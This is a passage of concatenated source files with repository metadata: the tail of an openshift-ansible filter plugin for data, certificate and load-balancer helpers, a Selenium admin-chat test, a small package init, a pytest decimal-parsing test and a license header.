    """Resolve a dotted path such as "a.b.c" against nested dicts.

    Returns the value found at the end of the path, or None as soon
    as any path component is missing.

    Ex: data = {'a': {'b': {'c': 5}}}
        attribute = "a.b.c"
        returns 5
    """
    if not attribute:
        raise errors.AnsibleFilterError("|failed expects attribute to be set")

    node = data
    for part in attribute.split('.'):
        if part not in node:
            # Path broken at this component: signal "not found".
            return None
        node = node[part]
    return node
def oo_flatten(data):
    """Flatten one level of nesting: a list of lists becomes one list."""
    if not isinstance(data, list):
        raise errors.AnsibleFilterError("|failed expects to flatten a List")
    flattened = []
    for sublist in data:
        flattened.extend(sublist)
    return flattened
def lib_utils_oo_collect(data_list, attribute=None, filters=None):
    """Collect ``attribute`` from every dict in ``data_list``.

    ``data_list`` may mix dicts and nested lists of dicts; nested lists
    are processed recursively.  When ``filters`` (a dict) is given, a
    dict contributes only if it matches *all* filter key/value pairs; a
    dict lacking a filter key is excluded.  None values are dropped.

    Ex: data_list = [{'a': 1, 'z': 'z'},
                     [{'a': 2, 'z': 'z'}, {'a': 3, 'z': 'b'}]]
        attribute = 'a'
        filters = {'z': 'z'}
        returns [2, 1]  # nested lists are collected first
    """
    if not isinstance(data_list, list):
        raise errors.AnsibleFilterError("lib_utils_oo_collect expects to filter on a List")

    if not attribute:
        raise errors.AnsibleFilterError("lib_utils_oo_collect expects attribute to be set")

    plain_items = []
    collected = []
    for entry in data_list:
        if isinstance(entry, list):
            # Nested list: recurse with the same attribute/filters.
            collected.extend(lib_utils_oo_collect(entry, attribute, filters))
        else:
            plain_items.append(entry)

    if filters is None:
        for item in plain_items:
            collected.append(get_attr(item, attribute))
    else:
        if not isinstance(filters, dict):
            raise errors.AnsibleFilterError(
                "lib_utils_oo_collect expects filter to be a dict")
        for item in plain_items:
            if all(get_attr(item, key) == filters[key] for key in filters):
                collected.append(get_attr(item, attribute))

    # Missing attributes resolve to None; drop them from the result.
    return [val for val in collected if val is not None]
def lib_utils_oo_select_keys_from_list(data, keys):
    """For each dict in ``data``, select the values of ``keys`` and
    flatten the per-dict value lists into one list.

    Ex: data = [{'a': 1, 'b': 2, 'c': 3}]
        keys = ['a', 'c']
        returns [1, 3]
    """
    if not isinstance(data, list):
        raise errors.AnsibleFilterError("|lib_utils_oo_select_keys_from_list failed expects to filter on a list")

    if not isinstance(keys, list):
        raise errors.AnsibleFilterError("|lib_utils_oo_select_keys_from_list failed expects first param is a list")

    per_item = []
    for entry in data:
        per_item.append(lib_utils_oo_select_keys(entry, keys))
    return oo_flatten(per_item)
def lib_utils_oo_select_keys(data, keys):
    """Return the values of ``data`` for each key listed in ``keys``.

    Keys absent from ``data`` are silently skipped.

    Ex: data = {'a': 1, 'b': 2, 'c': 3}
        keys = ['a', 'c']
        returns [1, 3]
    """
    if not isinstance(data, Mapping):
        raise errors.AnsibleFilterError("|lib_utils_oo_select_keys failed expects to filter on a dict or object")

    if not isinstance(keys, list):
        raise errors.AnsibleFilterError("|lib_utils_oo_select_keys failed expects first param is a list")

    values = []
    for key in keys:
        if key in data:
            values.append(data[key])
    return values
def lib_utils_oo_prepend_strings_in_list(data, prepend):
    """Prepend ``prepend`` to every string in ``data``.

    Ex: data = ['cart', 'tree']
        prepend = 'apple-'
        returns ['apple-cart', 'apple-tree']
    """
    if not isinstance(data, list):
        raise errors.AnsibleFilterError("|failed expects first param is a list")
    if not all(isinstance(entry, string_types) for entry in data):
        raise errors.AnsibleFilterError("|failed expects first param is a list"
                                        " of strings")
    return [prepend + entry for entry in data]
def lib_utils_oo_dict_to_list_of_dict(data, key_title='key', value_title='value'):
    """Rewrite a dict as a list of {key_title: k, value_title: v} dicts.

    Input data:
        {'region': 'infra', 'test_k': 'test_v'}
    Return data:
        [{'key': 'region', 'value': 'infra'}, {'key': 'test_k', 'value': 'test_v'}]

    Written for use of the oc_label module.
    """
    if not isinstance(data, dict):
        # pylint: disable=line-too-long
        raise errors.AnsibleFilterError("|failed expects first param is a dict. Got %s. Type: %s" % (str(data), str(type(data))))

    return [{key_title: key, value_title: value} for key, value in data.items()]
def oo_ami_selector(data, image_name):
    """Pick the newest AMI id from ``data`` (a list of AMI dicts).

    When ``image_name`` is None or does not end with '_*', AMIs are
    ranked by their full 'name'; otherwise they are ranked by the
    suffix after the final '_' in the name.  Returns None for an
    empty list.
    """
    if not isinstance(data, list):
        raise errors.AnsibleFilterError("|failed expects first param is a list")

    if not data:
        return None

    if image_name is None or not image_name.endswith('_*'):
        newest = max(data, key=itemgetter('name'))
        return newest['ami_id']

    # Wildcard name: rank by the trailing "_<suffix>" component.
    newest = max(data, key=lambda ami: ami['name'].split('_')[-1])
    return newest['ami_id']
def lib_utils_oo_split(string, separator=','):
    """Split ``string`` on ``separator``; a list input passes through
    unchanged."""
    return string if isinstance(string, list) else string.split(separator)
def lib_utils_oo_dict_to_keqv_list(data):
    """Take a dict and return a list of k=v pairs

        Input data:
        {'a': 1, 'b': 2}

        Return data:
        ['a=1', 'b=2']

    A string that looks like a dict literal (including json) is first
    parsed with ast.literal_eval.
    """
    if not isinstance(data, dict):
        try:
            # This will attempt to convert something that looks like a string
            # representation of a dictionary (including json) into a dictionary.
            data = ast.literal_eval(data)
        except (ValueError, SyntaxError):
            # literal_eval raises SyntaxError for malformed input and
            # ValueError for valid syntax that is not a literal; catch
            # both so either produces the filter error instead of an
            # unhandled traceback.
            msg = "|failed expects first param is a dict. Got {}. Type: {}"
            msg = msg.format(str(data), str(type(data)))
            raise errors.AnsibleFilterError(msg)
    return ['='.join(str(e) for e in x) for x in data.items()]
def lib_utils_oo_list_to_dict(lst, separator='='):
    """ This converts a list of ["k=v"] to a dictionary {k: v}.

    Only the first separator splits, so values containing the separator
    (e.g. base64 padding: "token=abc==") are kept intact instead of
    raising a ValueError during unpacking.
    """
    kvs = [i.split(separator, 1) for i in lst]
    return {k: v for k, v in kvs}
def haproxy_backend_masters(hosts, port):
    """Build the haproxy-role backend server list for the master hosts.

    Each host becomes a dict with a generated "master<idx>" name, an
    "<ip>:<port>" address taken from the host's openshift facts, and
    the 'check' health-check option.
    """
    backend = []
    for idx, host_info in enumerate(hosts):
        ip_addr = host_info['openshift']['common']['ip']
        backend.append({
            'name': "master%s" % idx,
            'address': "%s:%s" % (ip_addr, port),
            'opts': 'check',
        })
    return backend
# pylint: disable=too-many-branches, too-many-nested-blocks
def lib_utils_oo_parse_named_certificates(certificates, named_certs_dir, internal_hostnames):
    """ Parses names from list of certificate hashes.

        Ex: certificates = [{ "certfile": "/root/custom1.crt",
                              "keyfile": "/root/custom1.key",
                              "cafile": "/root/custom-ca1.crt" },
                            { "certfile": "custom2.crt",
                              "keyfile": "custom2.key",
                              "cafile": "custom-ca2.crt" }]

            returns [{ "certfile": "/etc/origin/master/named_certificates/custom1.crt",
                       "keyfile": "/etc/origin/master/named_certificates/custom1.key",
                       "cafile": "/etc/origin/master/named_certificates/custom-ca1.crt",
                       "names": [ "public-master-host.com",
                                  "other-master-host.com" ] },
                     { "certfile": "/etc/origin/master/named_certificates/custom2.crt",
                       "keyfile": "/etc/origin/master/named_certificates/custom2.key",
                       "cafile": "/etc/origin/master/named_certificates/custom-ca-2.crt",
                       "names": [ "some-hostname.com" ] }]
    """
    if not isinstance(named_certs_dir, string_types):
        raise errors.AnsibleFilterError("|failed expects named_certs_dir is str or unicode")

    if not isinstance(internal_hostnames, list):
        raise errors.AnsibleFilterError("|failed expects internal_hostnames is list")

    if not HAS_OPENSSL:
        raise errors.AnsibleFilterError("|missing OpenSSL python bindings")

    for certificate in certificates:
        # Certificates with explicit 'names' in the inventory are taken as-is.
        if 'names' in certificate.keys():
            continue
        else:
            certificate['names'] = []

        if not os.path.isfile(certificate['certfile']) or not os.path.isfile(certificate['keyfile']):
            raise errors.AnsibleFilterError("|certificate and/or key does not exist '%s', '%s'" %
                                            (certificate['certfile'], certificate['keyfile']))

        try:
            # NOTE(review): this file handle is never closed; consider a
            # with-block.
            st_cert = open(certificate['certfile'], 'rt').read()
            cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, st_cert)
            certificate['names'].append(str(cert.get_subject().commonName.decode()))
            for i in range(cert.get_extension_count()):
                # NOTE(review): on python3 get_short_name() returns bytes, so
                # this str comparison never matches and SAN entries are
                # skipped — presumably relies on python2 semantics; confirm.
                if cert.get_extension(i).get_short_name() == 'subjectAltName':
                    for name in str(cert.get_extension(i)).split(', '):
                        if 'DNS:' in name:
                            certificate['names'].append(name.replace('DNS:', ''))
        except Exception:
            raise errors.AnsibleFilterError(("|failed to parse certificate '%s', " % certificate['certfile'] +
                                             "please specify certificate names in host inventory"))

        # De-duplicate the collected names.
        certificate['names'] = list(set(certificate['names']))
        if 'cafile' not in certificate:
            # Without a CA file, names colliding with internal hostnames are
            # not allowed; having none left is a hard error.
            certificate['names'] = [name for name in certificate['names'] if name not in internal_hostnames]
            if not certificate['names']:
                raise errors.AnsibleFilterError(("|failed to parse certificate '%s' or " % certificate['certfile'] +
                                                 "detected a collision with internal hostname, please specify " +
                                                 "certificate names in host inventory"))

    for certificate in certificates:
        # Update paths for configuration
        certificate['certfile'] = os.path.join(named_certs_dir, os.path.basename(certificate['certfile']))
        certificate['keyfile'] = os.path.join(named_certs_dir, os.path.basename(certificate['keyfile']))
        if 'cafile' in certificate:
            certificate['cafile'] = os.path.join(named_certs_dir, os.path.basename(certificate['cafile']))
    return certificates
def lib_utils_oo_parse_certificate_san(certificate):
    """Return the list of SubjectAlternativeNames in a PEM certificate.

    ``certificate`` is the PEM text ('-----BEGIN CERTIFICATE-----' ...).
    'DNS:' and 'IP Address:' prefixes are stripped, so the result is a
    plain list of hostname/IP strings (e.g. ['192.168.122.186']).
    Returns [] when the certificate carries no subjectAltName extension.

    Raises AnsibleFilterError if the PEM cannot be parsed or the
    OpenSSL python bindings are missing.
    """
    if not HAS_OPENSSL:
        raise errors.AnsibleFilterError("|missing OpenSSL python bindings")

    names = []

    try:
        lcert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, certificate)
        for i in range(lcert.get_extension_count()):
            # get_short_name() returns bytes on python3; compare against a
            # bytes literal so the extension is found on both python2
            # (where b'...' == '...') and python3.
            if lcert.get_extension(i).get_short_name() == b'subjectAltName':
                sanstr = str(lcert.get_extension(i))
                sanstr = sanstr.replace('DNS:', '')
                sanstr = sanstr.replace('IP Address:', '')
                names = sanstr.split(', ')
    except Exception:
        raise errors.AnsibleFilterError("|failed to parse certificate")

    return names
def lib_utils_oo_generate_secret(num_bytes):
    """Generate a session secret: ``num_bytes`` of os.urandom entropy,
    base64-encoded and returned as a str."""
    if not isinstance(num_bytes, int):
        raise errors.AnsibleFilterError("|failed expects num_bytes is int")
    raw = os.urandom(num_bytes)
    return b64encode(raw).decode('utf-8')
def lib_utils_to_padded_yaml(data, level=0, indent=2, **kw):
    """ returns a yaml snippet padded to match the indent level you specify """
    # None and the empty string render as nothing rather than a YAML
    # null/empty document.
    if data in [None, ""]:
        return ""

    try:
        transformed = u(yaml.dump(data, indent=indent, allow_unicode=True,
                                  default_flow_style=False,
                                  Dumper=AnsibleDumper, **kw))
        # Shift every line right by level*indent spaces and lead with a
        # newline so the snippet can be appended directly after a key.
        padded = "\n".join([" " * level * indent + line for line in transformed.splitlines()])
        return "\n{0}".format(padded)
    except Exception as my_e:
        raise errors.AnsibleFilterError('Failed to convert: %s' % my_e)
def lib_utils_oo_image_tag_to_rpm_version(version, include_dash=False):
    """Convert an image tag string to an RPM version if necessary.

    Strips a leading "v" and everything from the first "-" onward
    (release components are no longer supported).  With
    include_dash=True a leading dash is prepended to any non-empty
    result.

    Ex. v3.2.0.10 -> -3.2.0.10
        v1.2.0-rc1 -> -1.2.0
    """
    if not isinstance(version, string_types):
        raise errors.AnsibleFilterError("|failed expects a string or unicode")

    tag = version
    if tag.startswith("v"):
        tag = tag[1:]
    # Strip release from requested version, we no longer support this.
    tag, _, _ = tag.partition('-')

    if include_dash and tag and not tag.startswith("-"):
        tag = "-" + tag

    return tag
def lib_utils_oo_hostname_from_url(url):
    """Return the hostname contained in a URL.

    Ex: https://ose3-master.example.com/v1/api -> ose3-master.example.com

    A scheme-less URL parses entirely into the path component, which
    is then returned as-is.
    """
    if not isinstance(url, string_types):
        raise errors.AnsibleFilterError("|failed expects a string or unicode")
    parsed = urlparse(url)
    # Without a scheme, urlparse leaves netloc empty and places the
    # whole input in path; fall back to that.
    return parsed.netloc if parsed.netloc != '' else parsed.path
# pylint: disable=invalid-name, unused-argument
def lib_utils_oo_loadbalancer_frontends(
        api_port, servers_hostvars, use_nuage=False, nuage_rest_port=None):
    """Build the haproxy frontend definitions for the API loadbalancer.

    Always returns the atomic-openshift-api frontend on ``api_port``;
    additionally emits a nuage-monitor frontend when ``use_nuage`` is
    truthy and ``nuage_rest_port`` is given.
    """
    frontends = [{
        'name': 'atomic-openshift-api',
        'mode': 'tcp',
        'options': ['tcplog'],
        'binds': ["*:{0}".format(api_port)],
        'default_backend': 'atomic-openshift-api',
    }]
    # use_nuage may arrive as a string from inventory; normalize it.
    nuage_enabled = bool(strtobool(str(use_nuage)))
    if nuage_enabled and nuage_rest_port is not None:
        frontends.append({
            'name': 'nuage-monitor',
            'mode': 'tcp',
            'options': ['tcplog'],
            'binds': ["*:{0}".format(nuage_rest_port)],
            'default_backend': 'nuage-monitor',
        })
    return frontends
# pylint: disable=invalid-name
def lib_utils_oo_loadbalancer_backends(
        api_port, servers_hostvars, use_nuage=False, nuage_rest_port=None):
    """Build the haproxy backend definitions for the API loadbalancer.

    Mirrors lib_utils_oo_loadbalancer_frontends: always emits the
    atomic-openshift-api backend, plus a nuage-monitor backend when
    ``use_nuage`` is truthy and ``nuage_rest_port`` is given.
    """
    def _backend(name, port):
        # Both backends share this shape; servers come from the masters.
        return {'name': name,
                'mode': 'tcp',
                'option': 'tcplog',
                'balance': 'source',
                'servers': haproxy_backend_masters(servers_hostvars, port)}

    backends = [_backend('atomic-openshift-api', api_port)]
    if bool(strtobool(str(use_nuage))) and nuage_rest_port is not None:
        backends.append(_backend('nuage-monitor', nuage_rest_port))
    return backends
def lib_utils_oo_random_word(length, source='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
    """Generate a random string of ``length`` characters drawn (with
    repetition) from ``source``; the default source is [a-z][A-Z][0-9].

    Ex:
    - lib_utils_oo_random_word(3) => e.g. 'aB9'
    - lib_utils_oo_random_word(4, source='012') => e.g. '0120'
    """
    chars = [random.choice(source) for _ in range(length)]
    return ''.join(chars)
def lib_utils_oo_selector_to_string_list(user_dict):
    """Convert a dict of selectors to a list of "key=value" strings.

    Ex: {'region': 'infra', 'zone': 'primary'}
        -> ['region=infra', 'zone=primary']
    """
    return ["{}={}".format(key, value) for key, value in user_dict.items()]
def lib_utils_oo_filter_sa_secrets(sa_secrets, secret_hint='-token-'):
    """Return the name of the first service-account secret whose name
    contains ``secret_hint``.

    ``sa_secrets`` is the 'results' list as returned by
    oc_serviceaccount_secret:state=list, i.e. a list of dicts like:

        [
            {"name": "management-admin-dockercfg-p31s2"},
            {"name": "management-admin-token-bnqsh"}
        ]

    With the default hint this selects the secret holding the service
    account's bearer token.  Returns None when nothing matches.

    Example playbook usage: register the result of
    oc_serviceaccount_secret and pipe sa.results through this filter to
    obtain the token secret's name for a follow-up oc_secret lookup.
    """
    for secret in sa_secrets:
        # Each entry is a dict carrying at least a 'name'.
        if secret_hint in secret['name']:
            return secret['name']
    return None
def lib_utils_oo_l_of_d_to_csv(input_list):
    """Render a list of dicts as comma-joined json objects.

    Ex: [{'var1': 'val1', 'var2': 'val2'}, {'var1': 'val3', 'var2': 'val4'}]
        -> '{"var1": "val1", "var2": "val2"},{"var1": "val3", "var2": "val4"}'
    """
    dumped = [json.dumps(entry) for entry in input_list]
    return ','.join(dumped)
def map_from_pairs(source, delim="="):
    """Parse a "k=v,k2=v2" string into a dict; '' yields {}."""
    if source == '':
        return dict()
    pairs = (entry.split(delim) for entry in source.split(","))
    return dict(pairs)
def map_to_pairs(source, delim="="):
    """Render a dict as a "k=v,k2=v2" string.

    Some default selectors are empty strings, so both {} and '' map to
    the empty string.
    """
    if source == {} or source == '':
        return str()

    # dict.items() behaves the same on python2 and python3 here, so the
    # six.iteritems() helper is unnecessary.
    return ','.join(["{}{}{}".format(key, delim, value)
                     for key, value in source.items()])
def lib_utils_oo_etcd_host_urls(hosts, use_ssl=True, port='2379'):
    """Return "<proto><host>:<port>" urls for every etcd host."""
    scheme = "https://" if use_ssl else "http://"
    port = str(port)
    return ["{}{}:{}".format(scheme, host, port) for host in hosts]
def lib_utils_mutate_htpass_provider(idps):
    """Force every HTPasswdPasswordIdentityProvider in ``idps`` to read
    /etc/origin/master/htpasswd.

    Any legacy filename key ('filename', 'fileName', 'file_name') is
    dropped and replaced by a hardcoded 'file' entry.  The list is
    mutated in place and returned.
    """
    legacy_keys = ('filename', 'fileName', 'file_name')
    for idp in idps:
        if 'provider' not in idp:
            continue
        provider = idp['provider']
        if provider['kind'] != 'HTPasswdPasswordIdentityProvider':
            continue
        for legacy in legacy_keys:
            provider.pop(legacy, None)
        provider['file'] = '/etc/origin/master/htpasswd'
    return idps
def lib_utils_oo_oreg_image(image_default, oreg_url):
    """Rebase ``image_default`` onto the registry host in ``oreg_url``.

    ``oreg_url`` should be passed in as the string "None" when
    undefined; in that case, or when oreg_url carries no host part,
    image_default is returned untouched.

    Ex: image_default = "quay.io/coreos/etcd:v99"
        oreg_url = "example.com/openshift/origin-${component}:${version}"
        returns "example.com/coreos/etcd:v99"
    """
    # if no oreg_url is specified, we just return the original default
    if oreg_url == 'None':
        return image_default

    oreg_parts = oreg_url.rsplit('/', 2)
    if len(oreg_parts) < 2:
        raise errors.AnsibleFilterError("oreg_url malformed: {}".format(oreg_url))

    has_host = len(oreg_parts) >= 3 and '.' in oreg_parts[0]
    if not has_host:
        # oreg_url does not include host information; keep the default.
        return image_default

    image_parts = image_default.split('/')
    if len(image_parts) < 3:
        raise errors.AnsibleFilterError("default image dictionary malformed, do not adjust this value.")

    return '/'.join([oreg_parts[0], image_parts[1], image_parts[2]])
def lib_utils_oo_list_of_dict_to_dict_from_key(input_list, keyname):
    """Index a list of dicts by the value each dict holds under keyname.

    Example input: [{'name': 'first', 'url': 'x.com'},
                    {'name': 'second', 'url': 'y.com'}], 'name'
    Example output: {'first': {'url': 'x.com', 'name': 'first'},
                     'second': {'url': 'y.com', 'name': 'second'}}

    Items that lack keyname are skipped rather than indexed under None.
    """
    output_dict = {}
    for item in input_list:
        retrieved_val = item.get(keyname)
        # Bug fix: the original tested `keyname is not None`, which let
        # items missing the key collapse onto a single None entry.
        if retrieved_val is not None:
            output_dict[retrieved_val] = item
    return output_dict
class FilterModule(object):
    """ Custom ansible filter mapping """

    # pylint: disable=no-self-use, too-few-public-methods
    def filters(self):
        """ returns a mapping of filters to methods """
        # Keys are the names usable in Jinja templates; values are the
        # module-level filter functions defined above.
        return {
            "lib_utils_oo_select_keys": lib_utils_oo_select_keys,
            "lib_utils_oo_select_keys_from_list": lib_utils_oo_select_keys_from_list,
            "lib_utils_oo_collect": lib_utils_oo_collect,
            "lib_utils_oo_pdb": lib_utils_oo_pdb,
            "lib_utils_oo_prepend_strings_in_list": lib_utils_oo_prepend_strings_in_list,
            "lib_utils_oo_dict_to_list_of_dict": lib_utils_oo_dict_to_list_of_dict,
            "lib_utils_oo_split": lib_utils_oo_split,
            "lib_utils_oo_dict_to_keqv_list": lib_utils_oo_dict_to_keqv_list,
            "lib_utils_oo_list_to_dict": lib_utils_oo_list_to_dict,
            "lib_utils_oo_parse_named_certificates": lib_utils_oo_parse_named_certificates,
            "lib_utils_oo_parse_certificate_san": lib_utils_oo_parse_certificate_san,
            "lib_utils_oo_generate_secret": lib_utils_oo_generate_secret,
            "lib_utils_oo_image_tag_to_rpm_version": lib_utils_oo_image_tag_to_rpm_version,
            "lib_utils_oo_hostname_from_url": lib_utils_oo_hostname_from_url,
            "lib_utils_oo_loadbalancer_frontends": lib_utils_oo_loadbalancer_frontends,
            "lib_utils_oo_loadbalancer_backends": lib_utils_oo_loadbalancer_backends,
            "lib_utils_to_padded_yaml": lib_utils_to_padded_yaml,
            "lib_utils_oo_random_word": lib_utils_oo_random_word,
            "lib_utils_oo_selector_to_string_list": lib_utils_oo_selector_to_string_list,
            "lib_utils_oo_filter_sa_secrets": lib_utils_oo_filter_sa_secrets,
            "lib_utils_oo_l_of_d_to_csv": lib_utils_oo_l_of_d_to_csv,
            "map_from_pairs": map_from_pairs,
            "map_to_pairs": map_to_pairs,
            "lib_utils_oo_etcd_host_urls": lib_utils_oo_etcd_host_urls,
            "lib_utils_mutate_htpass_provider": lib_utils_mutate_htpass_provider,
            "lib_utils_oo_oreg_image": lib_utils_oo_oreg_image,
            "lib_utils_oo_list_of_dict_to_dict_from_key": lib_utils_oo_list_of_dict_to_dict_from_key,
        }
|
ewolinetz/openshift-ansible
|
roles/lib_utils/filter_plugins/oo_filters.py
|
Python
|
apache-2.0
| 28,674
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
def main(argv):
    # Placeholder boilerplate entry point; the actual selenium test
    # logic runs at module level below.
    pass

if __name__ == '__main__':
    main(sys.argv)
import setup
from selenium.webdriver.common.by import By
## Test setup

# Map short test handles to the in-game player names used by the UI.
playerNames = {
    'zella': 'ZellaTheUltimate',
    'deckerd': 'DeckerdTheHesitant',
    'moldavi': 'MoldaviTheMoldavish',
    'drake': 'Drackan',
    'zeke': 'Zeke',
    'jack': 'JackSlayerTheBeanSlasher'
}
def getPathToElement(playerName, tag, name):
    """Build an XPath locating ``tag`` elements whose name contains
    ``name`` inside the given player's chat page."""
    template = "//*[contains(@id, 'chat-page-%s')]//%s[contains(@name, '%s')]"
    return template % (playerName, tag, name)
def closeNotifications(driver):
    # Dismiss any open notification popup so it cannot block later clicks.
    driver.Click([[By.NAME, 'close-notification']])
## Run admin chat test
driver = setup.MakeDriver()
driver.WaitForGameLoaded()

# Zeke is the non-admin player who starts the admin chat.
actingPlayer = 'zeke'
actingPlayerName = playerNames[actingPlayer]
chatName = actingPlayerName + ' & HvZ CDC'

# Switch to right user and open chat page
driver.SwitchUser(actingPlayer)

# Create chat with admin
driver.FindDrawerItem('Chat with Admins')
# Retry the drawer click until the chat room element actually appears.
driver.RetryUntil(
    lambda: driver.DrawerMenuClick('Chat with Admins'),
    lambda: driver.FindElement([[By.NAME, "chat-room-%s" % chatName]])
)

# Type a message into the chat
xpathTextarea = getPathToElement(actingPlayerName, 'textarea', 'input-' + chatName)
xpathSend = getPathToElement(actingPlayerName, 'paper-button', 'submit-' + chatName)
driver.FindElement([[By.NAME, 'input-%s' % chatName], [By.XPATH, xpathTextarea]])
driver.SendKeys([[By.NAME, 'input-%s' % chatName], [By.XPATH, xpathTextarea]],
                'Hi im %s, how do i know if im the possessed zombie?' % actingPlayerName)
driver.Click([[By.NAME, 'submit-%s' % chatName], [By.XPATH, xpathSend]])
def CheckAdminSeesMessage(admin, chatName):
    """Switch to ``admin`` and verify the player's message shows up in
    the admin chat room named ``chatName``.

    Relies on the module-level ``driver`` and on ``actingPlayerName``
    (the message author) already being set.
    """
    driver.SwitchUser(admin)
    closeNotifications(driver)
    driver.DrawerMenuClick('Admin Chats')
    driver.Click([[By.TAG_NAME, 'ghvz-admin-chat-page'], [By.NAME, 'drawer' + chatName]])
    driver.ExpectContains([
        [By.TAG_NAME, 'ghvz-admin-chat-page'],
        [By.NAME, 'message-%s-Hi im %s, how do i know if im the possessed zombie?' % (chatName, actingPlayerName)],
        [By.CLASS_NAME, 'message-bubble']],
        'Hi im %s, how do i know if im the possessed zombie?' % actingPlayerName)
# Check that every admin sees the chat and message
CheckAdminSeesMessage('zella', chatName)
CheckAdminSeesMessage('moldavi', chatName)

# Non-Admin should leave admin chat
driver.SwitchUser(actingPlayer)
driver.DrawerMenuClick(chatName)
driver.Click([[By.TAG_NAME, 'ghvz-drawer'], [By.NAME, 'drawer' + chatName]])
driver.Click([[By.TAG_NAME, 'ghvz-display-page'], [By.NAME, 'chat-card'], [By.NAME, 'chat-info-' + chatName]])
xpathChatDrawer = getPathToElement(actingPlayerName, 'div', 'chat-drawer-%s' % chatName)
driver.FindElement([[By.XPATH, xpathChatDrawer]])
xpathLeaveButton = getPathToElement(actingPlayerName, 'a', 'chat-drawer-leave')
driver.FindElement([[By.XPATH, xpathLeaveButton]])
driver.Click([[By.XPATH, xpathLeaveButton]])
# TODO: make leave button work the same way on mobile as it does on web

# Chat should be hidden, verify chat with admin button is available after leaving admin chat
driver.FindDrawerItem('Chat with Admins')

# Reopen admin chat
driver.DrawerMenuClick('Chat with Admins')

# Verify original message is still in chat room
driver.ExpectContains([
    [By.NAME, 'chat-card'],
    [By.NAME, 'message-%s-Hi im %s, how do i know if im the possessed zombie?' % (chatName, actingPlayerName)],
    [By.CLASS_NAME, 'message-bubble']],
    'Hi im %s, how do i know if im the possessed zombie?' % actingPlayerName)

# Player opens drawer and hides chat room
xpathChatDrawerButton = getPathToElement(actingPlayerName, 'paper-icon-button', 'chat-info-' + chatName)
driver.Click([[By.XPATH, xpathChatDrawerButton]])
xpathChatDrawer = getPathToElement(actingPlayerName, 'div', 'chat-drawer-%s' % chatName)
driver.FindElement([[By.XPATH, xpathChatDrawer]])
xpathLeaveButton = getPathToElement(actingPlayerName, 'a', 'chat-drawer-leave')
driver.FindElement([[By.XPATH, xpathLeaveButton]])
driver.Click([[By.XPATH, xpathLeaveButton]])
driver.DontFindElement([
    [By.NAME, 'chat-card'],
    [By.NAME, 'ChatRoom: Zeke & HvZ CDC']])

# Admin messages chat after player left
actingPlayer = 'moldavi'
driver.SwitchUser(actingPlayer)
driver.DrawerMenuClick(chatName)
actingPlayerName = playerNames[actingPlayer]
xpathTextarea = getPathToElement(actingPlayerName, 'textarea', 'input-' + chatName)
xpathSend = getPathToElement(actingPlayerName, 'paper-button', 'submit-' + chatName)
driver.FindElement([[By.XPATH, xpathTextarea]])
driver.SendKeys([[By.XPATH, xpathTextarea]],
                'Mere player, did you just leave the chat room!?')
driver.Click([[By.XPATH, xpathSend]])

# Make sure admin chat is visible again since there was a new message
actingPlayer = 'zeke'
driver.SwitchUser(actingPlayer)
driver.DrawerMenuClick(chatName)
driver.FindDrawerItem('Zeke & HvZ CDC')
driver.Quit()
|
google/playhvz
|
web/tests/adminchat.py
|
Python
|
apache-2.0
| 5,502
|
__version__ = '0.2.0'

from .common import TenX_Runs, Plates

# __all__ must be a sequence of name *strings*; the previous
# `__all__ = TenX_Runs, Plates` was a tuple of the imported objects
# themselves, which makes `from singlecell_dash import *` raise a
# TypeError.
__all__ = ['TenX_Runs', 'Plates']
|
czbiohub/singlecell-dash
|
singlecell_dash/__init__.py
|
Python
|
mit
| 89
|
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from decimal import Decimal
import pytest
from shuup.utils.numbers import parse_decimal_string
@pytest.mark.parametrize("input_val, expected_val", [
    (0.0, Decimal('0.0')),
    (1.1, Decimal('1.1')),
    (-1.1, Decimal('-1.1')),
    (1e10, Decimal('10000000000')),
    (1e10, Decimal('1e10')),  # same magnitude spelled in scientific notation
    (1e-10, Decimal('0.0000000001')),
    (1e-10, Decimal('1e-10'))
])
def test_parse_decimal_string_with_float_input(input_val, expected_val):
    """parse_decimal_string converts float inputs to the equivalent
    Decimal across large and small magnitudes in either notation."""
    result = parse_decimal_string(input_val)
    assert result == expected_val
|
hrayr-artunyan/shuup
|
shuup_tests/utils/test_numbers.py
|
Python
|
agpl-3.0
| 745
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
